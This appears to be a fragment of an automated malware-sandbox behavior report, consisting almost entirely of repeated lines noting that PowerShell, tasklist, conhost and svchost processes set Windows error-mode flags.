                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
